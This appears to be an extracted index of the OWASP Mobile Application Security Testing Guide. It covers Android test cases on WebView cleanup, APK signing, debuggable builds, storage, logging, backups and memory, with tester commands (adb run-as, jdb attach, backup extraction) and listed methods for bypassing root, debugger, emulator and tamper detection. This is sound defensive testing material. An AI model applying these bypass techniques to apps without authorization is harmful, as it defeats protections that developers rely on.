override fun cleanup() {\n clearFormData() // Removes the autocomplete popup from the currently focused form field, if present. Note this only affects the display of the autocomplete popup, it does not remove any saved form data from this WebView's store. To do that, use WebViewDatabase#clearFormData.\n clearHistory()\n clearMatches()\n clearSslPreferences()\n clearCache(true)\n\n CookieManager.getInstance().removeAllCookies(null)\n\n WebStorage.getInstance().deleteAllData() // Clears all storage currently being used by the JavaScript storage APIs. This includes the Application Cache, Web SQL Database and the HTML5 Web Storage APIs.\n\n val webViewDatabase = WebViewDatabase.getInstance(context)\n // It isn't entirely clear how this differs from WebView.clearFormData()\n @Suppress(\"DEPRECATION\")\n webViewDatabase.clearFormData() // Clears any saved data for web forms.\n webViewDatabase.clearHttpAuthUsernamePassword()\n\n deleteContentFromKnownLocations(context) // calls FileUtils.deleteWebViewDirectory(context) which deletes all content in \"app_webview\".\n}\n
The function finishes with some extra manual file deletion in deleteContentFromKnownLocations
which calls functions from FileUtils
. These functions use the java.io.File.deleteRecursively
method to recursively delete files from the specified directories.
private fun deleteContent(directory: File, doNotEraseWhitelist: Set<String> = emptySet()): Boolean {\n val filesToDelete = directory.listFiles()?.filter { !doNotEraseWhitelist.contains(it.name) } ?: return false\n return filesToDelete.all { it.deleteRecursively() }\n}\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0037/#dynamic-analysis","title":"Dynamic Analysis","text":"Open a WebView accessing sensitive data and then log out of the application. Access the application's storage container and make sure all WebView related files are deleted. The following files and folders are typically related to WebViews:
Make sure that the release build has been signed via both the v1 and v2 schemes for Android 7.0 (API level 24) and above and via all the three schemes for Android 9 (API level 28) and above, and that the code-signing certificate in the APK belongs to the developer.
APK signatures can be verified with the apksigner
tool. It is located at [SDK-Path]/build-tools/[version]
.
$ apksigner verify --verbose Desktop/example.apk\nVerifies\nVerified using v1 scheme (JAR signing): true\nVerified using v2 scheme (APK Signature Scheme v2): true\nVerified using v3 scheme (APK Signature Scheme v3): true\nNumber of signers: 1\n
The contents of the signing certificate can be examined with jarsigner
. Note that the Common Name (CN) attribute is set to \"Android Debug\" in the debug certificate.
The output for an APK signed with a debug certificate is shown below:
$ jarsigner -verify -verbose -certs example.apk\n\nsm 11116 Fri Nov 11 12:07:48 ICT 2016 AndroidManifest.xml\n\n X.509, CN=Android Debug, O=Android, C=US\n [certificate is valid from 3/24/16 9:18 AM to 8/10/43 9:18 AM]\n [CertPath not validated: Path doesn\\'t chain with any of the trust anchors]\n(...)\n
Ignore the \"CertPath not validated\" error. This error occurs with Java SDK 7 and above. Instead of jarsigner
, you can rely on the apksigner
to verify the certificate chain.
The signing configuration can be managed through Android Studio or the signingConfig
block in build.gradle
. To activate both the v1 and v2 schemes, the following values must be set:
v1SigningEnabled true\nv2SigningEnabled true\n
Several best practices for configuring the app for release are available in the official Android developer documentation.
Last but not least: make sure that the application is never deployed with your internal testing certificates.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0038/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis should be used to verify the APK signature.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/","title":"Testing whether the App is Debuggable","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/#static-analysis","title":"Static Analysis","text":"Check AndroidManifest.xml
to determine whether the android:debuggable
attribute has been set and to find the attribute's value:
...\n <application android:allowBackup=\"true\" android:debuggable=\"true\" android:icon=\"@drawable/ic_launcher\" android:label=\"@string/app_name\" android:theme=\"@style/AppTheme\">\n ...\n
You can use aapt
tool from the Android SDK with the following command line to quickly check if the android:debuggable=\"true\"
directive is present:
# If the command print 1 then the directive is present\n# The regex search for this line: android:debuggable(0x0101000f)=(type 0x12)0xffffffff\n$ aapt d xmltree sieve.apk AndroidManifest.xml | grep -Ec \"android:debuggable\\(0x[0-9a-f]+\\)=\\(type\\s0x[0-9a-f]+\\)0xffffffff\"\n1\n
For a release build, this attribute should always be set to \"false\"
(the default value).
adb
can be used to determine whether an application is debuggable.
Use the following command:
# If the command print a number superior to zero then the application have the debug flag\n# The regex search for these lines:\n# flags=[ DEBUGGABLE HAS_CODE ALLOW_CLEAR_USER_DATA ALLOW_BACKUP ]\n# pkgFlags=[ DEBUGGABLE HAS_CODE ALLOW_CLEAR_USER_DATA ALLOW_BACKUP ]\n$ adb shell dumpsys package com.mwr.example.sieve | grep -c \"DEBUGGABLE\"\n2\n$ adb shell dumpsys package com.nondebuggableapp | grep -c \"DEBUGGABLE\"\n0\n
If an application is debuggable, executing application commands is trivial. In the adb
shell, execute run-as
by appending the package name and application command to the binary name:
$ run-as com.vulnerable.app id\nuid=10084(u0_a84) gid=10084(u0_a84) groups=10083(u0_a83),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:untrusted_app:s0:c512,c768\n
Android Studio can also be used to debug an application and verify debugging activation for an app.
Another method for determining whether an application is debuggable is attaching jdb
to the running process. If this is successful, debugging will be activated.
The following procedure can be used to start a debug session with jdb
:
Using adb
and jdwp
, identify the PID of the active application that you want to debug:
$ adb jdwp\n2355\n16346 <== last launched, corresponds to our application\n
Create a communication channel by using adb
between the application process (with the PID) and your host computer by using a specific local port:
# adb forward tcp:[LOCAL_PORT] jdwp:[APPLICATION_PID]\n$ adb forward tcp:55555 jdwp:16346\n
Using jdb
, attach the debugger to the local communication channel port and start a debug session:
$ jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=55555\nSet uncaught java.lang.Throwable\nSet deferred uncaught java.lang.Throwable\nInitializing jdb ...\n> help\n
A few notes about debugging:
JADX
can be used to identify interesting locations for breakpoint insertion.jdb
is being bound to the local communication channel port, kill all adb sessions and start a single new session.Symbols are usually stripped during the build process, so you need the compiled bytecode and libraries to make sure that unnecessary metadata has been discarded.
First, find the nm
binary in your Android NDK and export it (or create an alias).
export NM = $ANDROID_NDK_DIR/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-nm\n
To display debug symbols:
$NM -a libfoo.so\n/tmp/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-nm: libfoo.so: no symbols\n
To display dynamic symbols:
$NM -D libfoo.so\n
Alternatively, open the file in your favorite disassembler and check the symbol tables manually.
Dynamic symbols can be stripped via the visibility
compiler flag. Adding this flag causes gcc to discard the function names while preserving the names of functions declared as JNIEXPORT
.
Make sure that the following has been added to build.gradle:
externalNativeBuild {\n cmake {\n cppFlags \"-fvisibility=hidden\"\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0040/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis should be used to verify debugging symbols.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/","title":"Testing for Debugging Code and Verbose Error Logging","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#static-analysis","title":"Static Analysis","text":"To determine whether StrictMode
is enabled, you can look for the StrictMode.setThreadPolicy
or StrictMode.setVmPolicy
methods. Most likely, they will be in the onCreate
method.
The detection methods for the thread policy are
detectDiskWrites()\ndetectDiskReads()\ndetectNetwork()\n
The penalties for thread policy violation are
penaltyLog() // Logs a message to LogCat\npenaltyDeath() // Crashes application, runs at the end of all enabled penalties\npenaltyDialog() // Shows a dialog\n
Have a look at the best practices for using StrictMode.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#dynamic-analysis","title":"Dynamic Analysis","text":"There are several ways of detecting StrictMode
; the best choice depends on how the policies' roles are implemented. They include
Run execution traces with jdb, DDMS, strace
, and/or kernel modules to find out what the app is doing. You'll usually see all kinds of suspect interactions with the operating system, such as opening su
for reading and obtaining a list of processes. These interactions are surefire signs of root detection. Identify and deactivate the root detection mechanisms, one at a time. If you're performing a black box resilience assessment, disabling the root detection mechanisms is your first step.
To bypass these checks, you can use several techniques, most of which were introduced in the \"Reverse Engineering and Tampering\" chapter:
su
binary is enough to defeat root detection (try not to break your environment though!)./proc
to prevent reading of process lists. Sometimes, the unavailability of /proc
is enough to bypass such checks.Check for root detection mechanisms, including the following criteria:
Develop bypass methods for the root detection mechanisms and answer the following questions:
If root detection is missing or too easily bypassed, make suggestions in line with the effectiveness criteria listed above. These suggestions may include more detection mechanisms and better integration of existing mechanisms with other defenses.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/","title":"Testing Anti-Debugging Detection","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/#bypassing-debugger-detection","title":"Bypassing Debugger Detection","text":"There's no generic way to bypass anti-debugging: the best method depends on the particular mechanism(s) used to prevent or detect debugging and the other defenses in the overall protection scheme. For example, if there are no integrity checks or you've already deactivated them, patching the app might be the easiest method. In other cases, a hooking framework or kernel modules might be preferable. The following methods describe different approaches to bypass debugger detection:
isDebuggable
and isDebuggerConnected
to hide the debugger.When dealing with obfuscated apps, you'll often find that developers purposely \"hide away\" data and functionality in native libraries. You'll find an example of this in UnCrackable App for Android Level 2.
At first glance, the code looks like the prior challenge. A class called CodeCheck
is responsible for verifying the code entered by the user. The actual check appears to occur in the bar
method, which is declared as a native method.
package sg.vantagepoint.uncrackable2;\n\npublic class CodeCheck {\n public CodeCheck() {\n super();\n }\n\n public boolean a(String arg2) {\n return this.bar(arg2.getBytes());\n }\n\n private native boolean bar(byte[] arg1) {\n }\n}\n\n static {\n System.loadLibrary(\"foo\");\n }\n
Please see different proposed solutions for the Android Crackme Level 2 in GitHub.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/#effectiveness-assessment","title":"Effectiveness Assessment","text":"Check for anti-debugging mechanisms, including the following criteria:
Work on bypassing the anti-debugging defenses and answer the following questions:
If anti-debugging mechanisms are missing or too easily bypassed, make suggestions in line with the effectiveness criteria above. These suggestions may include adding more detection mechanisms and better integration of existing mechanisms with other defenses.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/","title":"Testing File Integrity Checks","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-file-integrity-checks","title":"Bypassing File Integrity Checks","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-the-application-source-integrity-checks","title":"Bypassing the application-source integrity checks","text":"Refer to Method Hooking for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-the-storage-integrity-checks","title":"Bypassing the storage integrity checks","text":"Application-source integrity checks:
Run the app in an unmodified state and make sure that everything works. Apply simple patches to classes.dex
and any .so libraries in the app package. Re-package and re-sign the app as described in the \"Basic Security Testing\" chapter, then run the app. The app should detect the modification and respond in some way. At the very least, the app should alert the user and/or terminate. Work on bypassing the defenses and answer the following questions:
Storage integrity checks:
An approach similar to that for application-source integrity checks applies. Answer the following questions:
Launch the app with various reverse engineering tools and frameworks installed in your test device. Include at least the following: Frida, Xposed, Substrate for Android, RootCloak, Android SSL Trust Killer.
The app should respond in some way to the presence of those tools. For example by:
Next, work on bypassing the detection of the reverse engineering tools and answer the following questions:
The following steps should guide you when bypassing detection of reverse engineering tools:
Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/","title":"Testing Emulator Detection","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/#bypassing-emulator-detection","title":"Bypassing Emulator Detection","text":"TelephonyManager.getDeviceID
method to return an IMEI value.Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/#effectiveness-assessment","title":"Effectiveness Assessment","text":"Install and run the app in the emulator. The app should detect that it is being executed in an emulator and terminate or refuse to execute the functionality that's meant to be protected.
Work on bypassing the defenses and answer the following questions:
Make sure that all file-based detection of reverse engineering tools is disabled. Then, inject code by using Xposed, Frida, and Substrate, and attempt to install native hooks and Java method hooks. The app should detect the \"hostile\" code in its memory and respond accordingly.
Work on bypassing the checks with the following techniques:
Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/","title":"Testing Obfuscation","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#static-analysis","title":"Static Analysis","text":"Decompile the APK and review it to determine whether the codebase has been obfuscated.
Below you can find a sample for an obfuscated code block:
package com.a.a.a;\n\nimport com.a.a.b.a;\nimport java.util.List;\n\nclass a$b\n extends a\n{\n public a$b(List paramList)\n {\n super(paramList);\n }\n\n public boolean areAllItemsEnabled()\n {\n return true;\n }\n\n public boolean isEnabled(int paramInt)\n {\n return true;\n }\n}\n
Here are some considerations:
For native code:
Some of these techniques are discussed and analyzed in the blog post \"Security hardening of Android native code\" by Gautam Arvind and in the \"APKiD: Fast Identification of AppShielding Products\" presentation by Eduardo Novella.
For a more detailed assessment, you need a detailed understanding of the relevant threats and the obfuscation methods used. Tools such as APKiD may give you additional indications about which techniques were used for the target app such as obfuscators, packers and anti-debug measures.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use APKiD to detect if the app has been obfuscated.
Example using the UnCrackable App for Android Level 4:
apkid owasp-mastg/Crackmes/Android/Level_04/r2pay-v1.0.apk\n[+] APKiD 2.1.2 :: from RedNaga :: rednaga.io\n[*] owasp-mastg/Crackmes/Android/Level_04/r2pay-v1.0.apk!classes.dex\n |-> anti_vm : Build.TAGS check, possible ro.secure check\n |-> compiler : r8\n |-> obfuscator : unreadable field names, unreadable method names\n
In this case it detects that the app has unreadable field names and method names, among other things.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/","title":"Testing Local Storage for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/#overview","title":"Overview","text":"This test case focuses on identifying potentially sensitive data stored by an application and verifying if it is securely stored. The following checks should be performed:
SharedPreferences
, databases, Internal Storage, External Storage, etc.NOTE: For MASVS L1 compliance, it is sufficient to store data unencrypted in the application's internal storage directory (sandbox). For L2 compliance, additional encryption is required using cryptographic keys securely managed in the Android KeyStore. This includes using envelope encryption (DEK+KEK) or equivalent methods, or using the Android Security Library's EncryptedFile
/EncryptedSharedPreferences
.
First of all, try to determine the kind of storage used by the Android app and to find out whether the app processes sensitive data insecurely.
AndroidManifest.xml
for read/write external storage permissions, for example, uses-permission android:name=\"android.permission.WRITE_EXTERNAL_STORAGE\"
.MODE_WORLD_READABLE
or MODE_WORLD_WRITABLE
: You should avoid using MODE_WORLD_WRITEABLE
and MODE_WORLD_READABLE
for files because any app will be able to read from or write to the files, even if they are stored in the app's private data directory. If data must be shared with other applications, consider a content provider. A content provider offers read and write permissions to other apps and can grant dynamic permission on a case-by-case basis.SharedPreferences
class ( stores key-value pairs)FileOutPutStream
class (uses internal or external storage)getExternal*
functions (use external storage)getWritableDatabase
function (returns a SQLiteDatabase for writing)getReadableDatabase
function (returns a SQLiteDatabase for reading)getCacheDir
and getExternalCacheDirs
function (use cached files)Encryption should be implemented using proven SDK functions. The following describes bad practices to look for in the source code:
A typical misuse are hard-coded cryptographic keys. Hard-coded and world-readable cryptographic keys significantly increase the possibility that encrypted data will be recovered. Once an attacker obtains the data, decrypting it is trivial. Symmetric cryptography keys must be stored on the device, so identifying them is just a matter of time and effort. Consider the following code:
this.db = localUserSecretStore.getWritableDatabase(\"SuperPassword123\");\n
Obtaining the key is trivial because it is contained in the source code and identical for all installations of the app. Encrypting data this way is not beneficial. Look for hard-coded API keys/private keys and other valuable data; they pose a similar risk. Encoded/encrypted keys represent another attempt to make it harder but not impossible to get the crown jewels.
Consider the following code:
Example in Java:
//A more complicated effort to store the XOR'ed halves of a key (instead of the key itself)\nprivate static final String[] myCompositeKey = new String[]{\n \"oNQavjbaNNSgEqoCkT9Em4imeQQ=\",\"3o8eFOX4ri/F8fgHgiy/BS47\"\n};\n
Example in Kotlin:
private val myCompositeKey = arrayOf<String>(\"oNQavjbaNNSgEqoCkT9Em4imeQQ=\", \"3o8eFOX4ri/F8fgHgiy/BS47\")\n
The algorithm for decoding the original key might be something like this:
Example in Java:
public void useXorStringHiding(String myHiddenMessage) {\n byte[] xorParts0 = Base64.decode(myCompositeKey[0],0);\n byte[] xorParts1 = Base64.decode(myCompositeKey[1],0);\n\n byte[] xorKey = new byte[xorParts0.length];\n for(int i = 0; i < xorParts1.length; i++){\n xorKey[i] = (byte) (xorParts0[i] ^ xorParts1[i]);\n }\n HidingUtil.doHiding(myHiddenMessage.getBytes(), xorKey, false);\n}\n
Example in Kotlin:
fun useXorStringHiding(myHiddenMessage:String) {\n val xorParts0 = Base64.decode(myCompositeKey[0], 0)\n val xorParts1 = Base64.decode(myCompositeKey[1], 0)\n val xorKey = ByteArray(xorParts0.size)\n for (i in xorParts1.indices)\n {\n xorKey[i] = (xorParts0[i] xor xorParts1[i]).toByte()\n }\n HidingUtil.doHiding(myHiddenMessage.toByteArray(), xorKey, false)\n}\n
Verify common locations of secrets:
<resources>\n <string name=\"app_name\">SuperApp</string>\n <string name=\"hello_world\">Hello world!</string>\n <string name=\"action_settings\">Settings</string>\n <string name=\"secret_key\">My_Secret_Key</string>\n </resources>\n
buildTypes {\n debug {\n minifyEnabled true\n buildConfigField \"String\", \"hiddenPassword\", \"\\\"${hiddenPassword}\\\"\"\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/#dynamic-analysis","title":"Dynamic Analysis","text":"Install and use the app, executing all functions at least once. Data can be generated when entered by the user, sent by the endpoint, or shipped with the app. Then complete the following:
/data/data/<package-name>/databases
./data/data/<package-name>/shared_prefs
) for sensitive information. Shared Preferences are insecure and unencrypted by default. Some apps might opt to use secure-preferences to encrypt the values stored in Shared Preferences./data/data/<package-name>
. Only the user and group created when you installed the app (e.g., u0_a82) should have user read, write, and execute permissions (rwx
). Other users should not have permission to access files, but they may have execute permissions for directories.https://_firebaseProjectName_.firebaseio.com/.json
/data/data/<package-name>/files/
, whether it is unencrypted, and whether it contains sensitive information. By default, the file extension is realm
and the file name is default
. Inspect the Realm database with the Realm Browser.This test case focuses on identifying any sensitive application data within both system and application logs. The following checks should be performed:
As a general recommendation to avoid potential sensitive application data leakage, logging statements should be removed from production releases unless deemed necessary to the application or explicitly identified as safe, e.g. as a result of a security audit.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0003/#static-analysis","title":"Static Analysis","text":"Applications will often use the Log Class and Logger Class to create logs. To discover this, you should audit the application's source code for any such logging classes. These can often be found by searching for the following keywords:
Functions and classes, such as:
android.util.Log
Log.d
| Log.e
| Log.i
| Log.v
| Log.w
| Log.wtf
Logger
Keywords and system output:
System.out.print
| System.err.print
While preparing the production release, you can use tools like ProGuard (included in Android Studio). To determine whether all logging functions from the android.util.Log
class have been removed, check the ProGuard configuration file (proguard-rules.pro) for the following options (according to this example of removing logging code and this article about enabling ProGuard in an Android Studio project):
-assumenosideeffects class android.util.Log\n{\n public static boolean isLoggable(java.lang.String, int);\n public static int v(...);\n public static int i(...);\n public static int w(...);\n public static int d(...);\n public static int e(...);\n public static int wtf(...);\n}\n
Note that the example above only ensures that calls to the Log class' methods will be removed. If the string that will be logged is dynamically constructed, the code that constructs the string may remain in the bytecode. For example, the following code issues an implicit StringBuilder
to construct the log statement:
Example in Java:
Log.v(\"Private key tag\", \"Private key [byte format]: \" + key);\n
Example in Kotlin:
Log.v(\"Private key tag\", \"Private key [byte format]: $key\")\n
The compiled bytecode, however, is equivalent to the bytecode of the following log statement, which constructs the string explicitly:
Example in Java:
Log.v(\"Private key tag\", new StringBuilder(\"Private key [byte format]: \").append(key.toString()).toString());\n
Example in Kotlin:
Log.v(\"Private key tag\", StringBuilder(\"Private key [byte format]: \").append(key).toString())\n
ProGuard guarantees removal of the Log.v
method call. Whether the rest of the code (new StringBuilder ...
) will be removed depends on the complexity of the code and the ProGuard version.
This is a security risk because the (unused) string leaks plain text data into memory, which can be accessed via a debugger or memory dumping.
Unfortunately, no silver bullet exists for this issue, but one option would be to implement a custom logging facility that takes simple arguments and constructs the log statements internally.
SecureLog.v(\"Private key [byte format]: \", key);\n
Then configure ProGuard to strip its calls.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0003/#dynamic-analysis","title":"Dynamic Analysis","text":"Use all the mobile app functions at least once, then identify the application's data directory and look for log files (/data/data/<package-name>
). Check the application logs to determine whether log data has been generated; some mobile applications create and store their own logs in the data directory.
Many application developers still use System.out.println
or printStackTrace
instead of a proper logging class. Therefore, your testing strategy must include all output generated while the application is starting, running and closing. To determine what data is directly printed by System.out.println
or printStackTrace
, you can use Logcat
as explained in the chapter \"Basic Security Testing\", section \"Monitoring System Logs\".
Remember that you can target a specific app by filtering the Logcat output as follows:
adb logcat | grep \"$(adb shell ps | grep <package-name> | awk '{print $2}')\"\n
If you already know the app PID you may give it directly using --pid
flag.
You may also want to apply further filters or regular expressions (using logcat
's regex flags -e <expr>, --regex=<expr>
for example) if you expect certain strings or patterns to come up in the logs.
To determine whether API calls and functions provided by the third-party library are used according to best practices, review their source code, requested permissions and check for any known vulnerabilities.
All data that's sent to third-party services should be anonymized to prevent exposure of PII (Personal Identifiable Information) that would allow the third party to identify the user account. No other data (such as IDs that can be mapped to a user account or session) should be sent to a third party.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0004/#dynamic-analysis","title":"Dynamic Analysis","text":"Check all requests to external services for embedded sensitive information. To intercept traffic between the client and server, you can perform dynamic analysis by launching a man-in-the-middle (MITM) attack with Burp Suite Professional or OWASP ZAP. Once you route the traffic through the interception proxy, you can try to sniff the traffic that passes between the app and server. All app requests that aren't sent directly to the server on which the main function is hosted should be checked for sensitive information, such as PII in a tracker or ad service.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/","title":"Determining Whether Sensitive Data Is Shared with Third Parties via Notifications","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/#static-analysis","title":"Static Analysis","text":"Search for any usage of the NotificationManager
class which might be an indication of some form of notification management. If the class is being used, the next step would be to understand how the application is generating the notifications and which data ends up being shown.
Run the application and start tracing all calls to functions related to the notifications creation, e.g. setContentTitle
or setContentText
from NotificationCompat.Builder
. Observe the trace in the end and evaluate if it contains any sensitive information which another app might have eavesdropped.
In the layout definition of an activity, you can define TextViews
that have XML attributes. If the XML attribute android:inputType
is given the value textNoSuggestions
, the keyboard cache will not be shown when the input field is selected. The user will have to type everything manually.
<EditText\n android:id=\"@+id/KeyBoardCache\"\n android:inputType=\"textNoSuggestions\" />\n
The code for all input fields that take sensitive information should include this XML attribute to disable the keyboard suggestions.
Alternatively, the developer can use the following constants:
XMLandroid:inputType
Code InputType
API level textPassword
TYPE_TEXT_VARIATION_PASSWORD
3 textVisiblePassword
TYPE_TEXT_VARIATION_VISIBLE_PASSWORD
3 numberPassword
TYPE_NUMBER_VARIATION_PASSWORD
11 textWebPassword
TYPE_TEXT_VARIATION_WEB_PASSWORD
11 Check the application code to verify that none of the input types are being overwritten. For example, by doing findViewById(R.id.KeyBoardCache).setInputType(InputType.TYPE_CLASS_TEXT)
the input type of the input field KeyBoardCache
is set to text
reenabling the keyboard cache.
Finally, check the minimum required SDK version in the Android Manifest (android:minSdkVersion
) since it must support the used constants (for example, Android SDK version 11 is required for textWebPassword
). Otherwise, the compiled app would not honor the used input type constants allowing keyboard caching.
Start the app and click in the input fields that take sensitive data. If strings are suggested, the keyboard cache has not been disabled for these fields.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/","title":"Testing Backups for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#local","title":"Local","text":"Check the AndroidManifest.xml
file for the following flag:
android:allowBackup=\"true\"\n
If the flag value is true, determine whether the app saves any kind of sensitive data (check the test case \"Testing for Sensitive Data in Local Storage\").
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#cloud","title":"Cloud","text":"Regardless of whether you use key/value backup or auto backup, you must determine the following:
If you don't want to share files with Google Cloud, you can exclude them from Auto Backup. Sensitive information stored at rest on the device should be encrypted before being sent to the cloud.
android:allowBackup
within the application's manifest file. Auto Backup is enabled by default for applications that target Android 6.0 (API level 23). You can use the attribute android:fullBackupOnly
to activate auto backup when implementing a backup agent, but this attribute is available for Android versions 6.0 and above only. Other Android versions use key/value backup instead.android:fullBackupOnly\n
Auto backup includes almost all the app files and stores up 25 MB of them per app in the user's Google Drive account. Only the most recent backup is stored; the previous backup is deleted.
AndroidManifest.xml
for the following attribute:android:backupAgent\n
To implement key/value backup, extend one of the following classes:
To check for key/value backup implementations, look for these classes in the source code.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#dynamic-analysis","title":"Dynamic Analysis","text":"After executing all available app functions, attempt to back up via adb
. If the backup is successful, inspect the backup archive for sensitive data. Open a terminal and run the following command:
adb backup -apk -nosystem <package-name>\n
ADB should respond now with \"Now unlock your device and confirm the backup operation\" and you should be asked on the Android phone for a password. This is an optional step and you don't need to provide one. If the phone does not prompt this message, try the following command including the quotes:
adb backup \"-apk -nosystem <package-name>\"\n
The problem happens when your device has an adb version prior to 1.0.31. If that's the case you must use an adb version of 1.0.31 also on your host computer. Versions of adb after 1.0.32 broke the backwards compatibility.
Approve the backup from your device by selecting the Back up my data option. After the backup process is finished, the file .ab will be in your working directory. Run the following command to convert the .ab file to tar.
dd if=mybackup.ab bs=24 skip=1|openssl zlib -d > mybackup.tar\n
In case you get the error openssl:Error: 'zlib' is an invalid command.
you can try to use Python instead.
dd if=backup.ab bs=1 skip=24 | python -c \"import zlib,sys;sys.stdout.write(zlib.decompress(sys.stdin.read()))\" > backup.tar\n
The Android Backup Extractor is another alternative backup tool. To make the tool to work, you have to download the Oracle JCE Unlimited Strength Jurisdiction Policy Files for JRE7 or JRE8 and place them in the JRE lib/security folder. Run the following command to convert the tar file:
java -jar abe.jar unpack backup.ab\n
if it shows some Cipher information and usage, which means it hasn't unpacked successfully. In this case you can give a try with more arguments:
abe [-debug] [-useenv=yourenv] unpack <backup.ab> <backup.tar> [password]\n
[password]
is the password when your android device asked you earlier. For example here is: 123
java -jar abe.jar unpack backup.ab backup.tar 123\n
Extract the tar file to your working directory.
tar xvf mybackup.tar\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/","title":"Testing Memory for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#overview","title":"Overview","text":"Analyzing memory can help developers identify the root causes of several problems, such as application crashes. However, it can also be used to access sensitive data. This section describes how to check for data disclosure via process memory.
First identify sensitive information that is stored in memory. Sensitive assets have likely been loaded into memory at some point. The objective is to verify that this information is exposed as briefly as possible.
To investigate an application's memory, you must first create a memory dump. You can also analyze the memory in real-time, e.g., via a debugger. Regardless of your approach, memory dumping is a very error-prone process in terms of verification because each dump contains the output of executed functions. You may miss executing critical scenarios. In addition, overlooking data during analysis is probable unless you know the data's footprint (either the exact value or the data format). For example, if the app encrypts with a randomly generated symmetric key, you likely won't be able to spot it in memory unless you can recognize the key's value in another context.
Therefore, you are better off starting with static analysis.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#static-analysis","title":"Static Analysis","text":"When performing static analysis to identify sensitive data that is exposed in memory, you should:
String
and BigInteger
).StringBuilder
).finalize
method.The following section describes pitfalls of data leakage in memory and best practices for avoiding them.
Don't use immutable structures (e.g., String
and BigInteger
) to represent secrets. Nullifying these structures will be ineffective: the garbage collector may collect them, but they may remain on the heap after garbage collection. Nevertheless, you should ask for garbage collection after every critical operation (e.g., encryption, parsing server responses that contain sensitive information). When copies of the information have not been properly cleaned (as explained below), your request will help reduce the length of time for which these copies are available in memory.
To properly clean sensitive information from memory, store it in primitive data types, such as byte-arrays (byte[]
) and char-arrays (char[]
). You should avoid storing the information in mutable non-primitive data types.
Make sure to overwrite the content of the critical object once the object is no longer needed. Overwriting the content with zeroes is one simple and very popular method:
Example in Java:
byte[] secret = null;\ntry{\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n Arrays.fill(secret, (byte) 0);\n }\n}\n
Example in Kotlin:
val secret: ByteArray? = null\ntry {\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n Arrays.fill(secret, 0.toByte())\n }\n}\n
